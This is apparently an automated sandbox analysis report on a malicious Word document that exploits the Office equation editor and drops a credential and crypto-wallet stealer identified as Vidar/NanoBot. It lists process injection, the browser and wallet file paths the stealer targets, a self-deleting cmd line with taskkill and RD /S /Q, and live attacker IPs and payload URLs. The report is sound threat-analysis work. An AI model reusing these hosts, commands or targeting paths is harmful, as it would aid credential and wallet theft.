    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_0041E640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_0041D360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_004043DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_00420540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_0041F6B0 FindFirstFileExW,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0041B4E0 GetSystemInfo,
    Source: C:\Users\user\toqqx.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\toqqx.exeThread delayed: delay time: 922337203685477
    Source: toqqx.exe, 00000008.00000002.2250803213.0000000000A60000.00000004.00000001.sdmpBinary or memory string: vmware+microsoft corporation
    Source: C:\Users\user\toqqx.exeProcess information queried: ProcessInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess queried: DebugPort
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess queried: DebugPort
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_0041DCA0 GetCurrentDirectoryA,lstrcat,CopyFileA,_memset,wsprintfA,LdrInitializeThunk,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_fprintf,_fprintf,DeleteFileA,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_004072E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0041C810 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_004196D0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0041B750 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_004196D0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_0041B750 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0041B160 GetCurrentHwProfileA,GetProcessHeap,HeapAlloc,lstrcat,
    Source: C:\Users\user\toqqx.exeProcess token adjusted: Debug
    Source: C:\Users\user\toqqx.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_004072E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_00404354 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0040E5C7 SetUnhandledExceptionFilter,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_004072E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_00404354 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_0040E5C7 SetUnhandledExceptionFilter,
    Source: C:\Users\user\toqqx.exeMemory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Allocates memory in foreign processesShow sources
    Source: C:\Users\user\toqqx.exeMemory allocated: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 400000 protect: page execute and read and write
    Source: C:\Users\user\toqqx.exeMemory allocated: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 400000 protect: page execute and read and write
    Injects a PE file into a foreign processesShow sources
    Source: C:\Users\user\toqqx.exeMemory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 400000 value starts with: 4D5A
    Source: C:\Users\user\toqqx.exeMemory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 400000 value starts with: 4D5A
    Writes to foreign memory regionsShow sources
    Source: C:\Users\user\toqqx.exeMemory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 400000
    Source: C:\Users\user\toqqx.exeMemory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 401000
    Source: C:\Users\user\toqqx.exeMemory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 427000
    Source: C:\Users\user\toqqx.exeMemory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 430000
    Source: C:\Users\user\toqqx.exeMemory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 435000
    Source: C:\Users\user\toqqx.exeMemory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 7EFDE008
    Source: C:\Users\user\toqqx.exeMemory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 400000
    Source: C:\Users\user\toqqx.exeMemory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 401000
    Source: C:\Users\user\toqqx.exeMemory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 427000
    Source: C:\Users\user\toqqx.exeMemory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 430000
    Source: C:\Users\user\toqqx.exeMemory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 435000
    Source: C:\Users\user\toqqx.exeMemory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 7EFDE008
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\toqqx.exe C:\Users\user\toqqx.exe
    Source: C:\Users\user\toqqx.exeProcess created: C:\Users\user\AppData\Local\Temp\toqqx.exe C:\Users\user\AppData\Local\Temp\toqqx.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\toqqx.exe C:\Users\user\toqqx.exe
    Source: C:\Users\user\toqqx.exeProcess created: C:\Users\user\AppData\Local\Temp\toqqx.exe C:\Users\user\AppData\Local\Temp\toqqx.exe
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /pid 2540 & erase C:\Users\user\AppData\Local\Temp\toqqx.exe & RD /S /Q C:\\ProgramData\\843743064682002\\* & exit
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 2540
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 2540
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
    Source: C:\Users\user\toqqx.exeQueries volume information: C:\Users\user\toqqx.exe VolumeInformation
    Source: C:\Users\user\toqqx.exeQueries volume information: C:\Users\user\toqqx.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeQueries volume information: C:\ProgramData\843743064682002\autofill\Google Chrome_Default.txt VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeQueries volume information: C:\ProgramData\843743064682002\cc\Google Chrome_Default.txt VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeQueries volume information: C:\ProgramData\843743064682002\cookies\Google Chrome_Default.txt VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeQueries volume information: C:\ProgramData\843743064682002\cookies\Mozilla Firefox_7xwghk55.default.txt VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeQueries volume information: C:\ProgramData\843743064682002\outlook.txt VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeQueries volume information: C:\ProgramData\843743064682002\passwords.txt VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeQueries volume information: C:\ProgramData\843743064682002\screenshot.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeQueries volume information: C:\ProgramData\843743064682002\system.txt VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_00416D00 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0041B1E0 GetUserNameA,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0040D6E2 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_0041BEE0 _memset,_memset,GetVersionExA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,FreeLibrary,
    Source: C:\Users\user\toqqx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Stealing of Sensitive Information:

    barindex
    Yara detected Vidar stealerShow sources
    Source: Yara matchFile source: Process Memory Space: toqqx.exe PID: 2540, type: MEMORY
    Found many strings related to Crypto-Wallets (likely being stolen)Show sources
    Source: toqqx.exe, 0000000B.00000003.2260423526.000000000089C000.00000004.00000001.sdmpString found in binary or memory: Electrum
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmpString found in binary or memory: \\ElectronCash
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmpString found in binary or memory: window-state.json
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmpString found in binary or memory: \\jaxx\\
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmpString found in binary or memory: exodus.conf.json
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmpString found in binary or memory: info.seco
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmpString found in binary or memory: \\Exodus\\
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmpString found in binary or memory: passphrase.json
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmpString found in binary or memory: \\Ethereum\\
    Source: toqqx.exe, 0000000B.00000003.2260423526.000000000089C000.00000004.00000001.sdmpString found in binary or memory: Exodus
    Source: toqqx.exe, 0000000B.00000003.2260423526.000000000089C000.00000004.00000001.sdmpString found in binary or memory: Ethereum
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmpString found in binary or memory: default_wallet
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmpString found in binary or memory: multidoge.wallet
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmpString found in binary or memory: seed.seco
    Source: toqqx.exe, 00000004.00000002.2234554822.0000000000760000.00000004.00000001.sdmpString found in binary or memory: set_UseMachineKeyStore
    Tries to harvest and steal browser information (history, passwords, etc)Show sources
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
    Tries to steal Crypto Currency WalletsShow sources
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\

    Remote Access Functionality:

    barindex
    Yara detected Vidar stealerShow sources
    Source: Yara matchFile source: Process Memory Space: toqqx.exe PID: 2540, type: MEMORY

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management Instrumentation1Application Shimming1Application Shimming1Disable or Modify Tools11OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumData Obfuscation2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsNative API1Registry Run Keys / Startup Folder11Process Injection311Deobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolData from Local System3Exfiltration Over BluetoothIngress Tool Transfer13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsExploitation for Client Execution12Logon Script (Windows)Registry Run Keys / Startup Folder11Obfuscated Files or Information4Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationEncrypted Channel2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsCommand and Scripting Interpreter1Logon Script (Mac)Logon Script (Mac)Software Packing3NTDSSystem Information Discovery38Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsSecurity Software Discovery231SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol22Manipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion31Cached Domain CredentialsProcess Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection311DCSyncVirtualization/Sandbox Evasion31Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 404284 Sample: PL_503_13_570.docx Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 59 Found malware configuration 2->59 61 Multi AV Scanner detection for dropped file 2->61 63 Multi AV Scanner detection for submitted file 2->63 65 11 other signatures 2->65 9 EQNEDT32.EXE 12 2->9         started        14 EQNEDT32.EXE 9 2->14         started        16 WINWORD.EXE 293 23 2->16         started        18 3 other processes 2->18 process3 dnsIp4 55 31.210.20.6, 49165, 80 PLUSSERVER-ASN1DE Netherlands 9->55 41 C:\Users\user\toqqx.exe, PE32 9->41 dropped 43 C:\Users\user\AppData\Local\...\Sugvt[1].exe, PE32 9->43 dropped 77 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->77 20 toqqx.exe 5 9->20         started        24 toqqx.exe 2 14->24         started        file5 signatures6 process7 file8 37 C:\Users\user\AppData\Local\Temp\toqqx.exe, PE32 20->37 dropped 67 Multi AV Scanner detection for dropped file 20->67 69 Creates an undocumented autostart registry key 20->69 71 Writes to foreign memory regions 20->71 26 toqqx.exe 194 20->26         started        39 C:\Users\user\AppData\Roaming\...\notpad.exe, PE32 24->39 dropped 73 Allocates memory in foreign processes 24->73 75 Injects a PE file into a foreign processes 24->75 31 toqqx.exe 20 24->31         started        signatures9 process10 dnsIp11 57 198.98.60.43, 49166, 49167, 80 PONYNETUS United States 26->57 45 C:\ProgramData\sqlite3.dll, PE32 26->45 dropped 79 Multi AV Scanner detection for dropped file 26->79 81 Tries to harvest and steal browser information (history, passwords, etc) 26->81 83 Tries to steal Crypto Currency Wallets 26->83 33 cmd.exe 26->33         started        47 C:\ProgramData\vcruntime140.dll, PE32 31->47 dropped 49 C:\ProgramData\softokn3.dll, PE32 31->49 dropped 51 C:\ProgramData\nss3.dll, PE32 31->51 dropped 53 3 other files (none is malicious) 31->53 dropped file12 signatures13 process14 process15 35 taskkill.exe 33->35         started       

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    PL_503_13_570.docx36%VirustotalBrowse
    PL_503_13_570.docx34%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\ProgramData\freebl3.dll0%MetadefenderBrowse
    C:\ProgramData\freebl3.dll0%ReversingLabs
    C:\ProgramData\mozglue.dll3%MetadefenderBrowse
    C:\ProgramData\mozglue.dll0%ReversingLabs
    C:\ProgramData\msvcp140.dll0%MetadefenderBrowse
    C:\ProgramData\msvcp140.dll0%ReversingLabs
    C:\ProgramData\nss3.dll0%MetadefenderBrowse
    C:\ProgramData\nss3.dll0%ReversingLabs
    C:\ProgramData\softokn3.dll0%MetadefenderBrowse
    C:\ProgramData\softokn3.dll0%ReversingLabs
    C:\ProgramData\sqlite3.dll0%MetadefenderBrowse
    C:\ProgramData\sqlite3.dll0%ReversingLabs
    C:\ProgramData\vcruntime140.dll0%MetadefenderBrowse
    C:\ProgramData\vcruntime140.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Sugvt[1].exe47%ReversingLabsByteCode-MSIL.Backdoor.NanoBot
    C:\Users\user\AppData\Local\Temp\toqqx.exe47%ReversingLabsByteCode-MSIL.Backdoor.NanoBot
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe47%ReversingLabsByteCode-MSIL.Backdoor.NanoBot
    C:\Users\user\toqqx.exe47%ReversingLabsByteCode-MSIL.Backdoor.NanoBot

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    8.2.toqqx.exe.26d92d4.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
    4.2.toqqx.exe.34fea98.5.unpack100%AviraTR/Patched.Ren.GenDownload File
    8.2.toqqx.exe.3526ab8.5.unpack100%AviraTR/Patched.Ren.GenDownload File
    4.2.toqqx.exe.2537438.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
    11.2.toqqx.exe.400000.0.unpack100%AviraHEUR/AGEN.1136795Download File
    4.2.toqqx.exe.3576ad8.7.unpack100%AviraTR/Patched.Ren.GenDownload File
    8.2.toqqx.exe.34fea98.6.unpack100%AviraTR/Patched.Ren.GenDownload File
    13.2.toqqx.exe.400000.0.unpack100%AviraHEUR/AGEN.1136795Download File
    8.2.toqqx.exe.3576ad8.7.unpack100%AviraTR/Patched.Ren.GenDownload File
    4.2.toqqx.exe.3526ab8.6.unpack100%AviraTR/Patched.Ren.GenDownload File

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://198.98.60.43/6.jpg0%VirustotalBrowse
    http://198.98.60.43/6.jpg0%Avira URL Cloudsafe
    http://198.98.60.43/main.php1%VirustotalBrowse
    http://198.98.60.43/main.php0%Avira URL Cloudsafe
    http://ocsp.thawte.com00%URL Reputationsafe
    http://ocsp.thawte.com00%URL Reputationsafe
    http://ocsp.thawte.com00%URL Reputationsafe
    http://ocsp.thawte.com00%URL Reputationsafe
    http://31.210.20.6/3/Sugvt.exe1%VirustotalBrowse
    http://31.210.20.6/3/Sugvt.exe0%Avira URL Cloudsafe
    http://198.98.60.43/1.jpg0%Avira URL Cloudsafe
    http://www.mozilla.com00%URL Reputationsafe
    http://www.mozilla.com00%URL Reputationsafe
    http://www.mozilla.com00%URL Reputationsafe
    http://www.mozilla.com00%URL Reputationsafe
    https://discord.com/0%URL Reputationsafe
    https://discord.com/0%URL Reputationsafe
    https://discord.com/0%URL Reputationsafe
    https://discord.com/0%URL Reputationsafe
    http://198.98.60.43/7.jpg0%Avira URL Cloudsafe
    http://198.98.60.43/2.jpg0%Avira URL Cloudsafe
    http://198.98.60.43/0%Avira URL Cloudsafe
    https://discord.com/20%Avira URL Cloudsafe
    https://discord.com/60%Avira URL Cloudsafe
    http://198.98.60.43/3.jpg0%Avira URL Cloudsafe
    https://discord.com/:0%Avira URL Cloudsafe
    http://198.98.60.43/5.jpg0%Avira URL Cloudsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://198.98.60.43/4.jpg0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://198.98.60.43/6.jpgtrue
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://198.98.60.43/main.phptrue
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://31.210.20.6/3/Sugvt.exetrue
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://198.98.60.43/1.jpgtrue
    • Avira URL Cloud: safe
    unknown
    http://198.98.60.43/7.jpgtrue
    • Avira URL Cloud: safe
    unknown
    http://198.98.60.43/2.jpgtrue
    • Avira URL Cloud: safe
    unknown
    http://198.98.60.43/true
    • Avira URL Cloud: safe
    unknown
    http://198.98.60.43/3.jpgtrue
    • Avira URL Cloud: safe
    unknown
    http://198.98.60.43/5.jpgtrue
    • Avira URL Cloud: safe
    unknown
    http://198.98.60.43/4.jpgtrue
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://duckduckgo.com/chrome_newtabtoqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmpfalse
      high
      http://www.mozilla.com/en-US/blocklist/toqqx.exe, 0000000B.00000003.2241406880.0000000000990000.00000004.00000001.sdmpfalse
        high
        https://duckduckgo.com/ac/?q=toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmpfalse
          high
          http://ocsp.thawte.com0toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmptrue
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.mozilla.com0toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmptrue
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmpfalse
            high
            https://discord.com/toqqx.exetrue
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchtoqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmpfalse
              high
              https://ac.ecosia.org/autocomplete?q=toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmpfalse
                high
                https://discord.com/2toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000002.2250455395.0000000000489000.00000004.00000020.sdmp, toqqx.exe, 0000000B.00000000.2231082620.000000000105A000.00000002.00020000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.toqqx.exe, 00000004.00000002.2240187063.0000000005B30000.00000002.00000001.sdmp, toqqx.exe, 00000008.00000002.2255199061.0000000005840000.00000002.00000001.sdmpfalse
                  high
                  https://discord.com/6toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000002.2250455395.0000000000489000.00000004.00000020.sdmp, toqqx.exe, 0000000B.00000000.2231082620.000000000105A000.00000002.00020000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.thawte.com/ThawteTimestampingCA.crl0toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpfalse
                    high
                    https://discord.com/:toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000002.2250455395.0000000000489000.00000004.00000020.sdmp, toqqx.exe, 0000000B.00000000.2231082620.000000000105A000.00000002.00020000.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    http://www.%s.comPAtoqqx.exe, 00000004.00000002.2240187063.0000000005B30000.00000002.00000001.sdmp, toqqx.exe, 00000008.00000002.2255199061.0000000005840000.00000002.00000001.sdmptrue
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    low
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmpfalse
                      high
                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmpfalse
                        high

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        198.98.60.43
                        unknownUnited States
                        53667PONYNETUStrue
                        31.210.20.6
                        unknownNetherlands
                        61157PLUSSERVER-ASN1DEtrue

                        General Information

                        Joe Sandbox Version:32.0.0 Black Diamond
                        Analysis ID:404284
                        Start date:04.05.2021
                        Start time:21:32:59
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 10m 59s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:PL_503_13_570.docx
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:20
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winDOCX@18/32@0/2
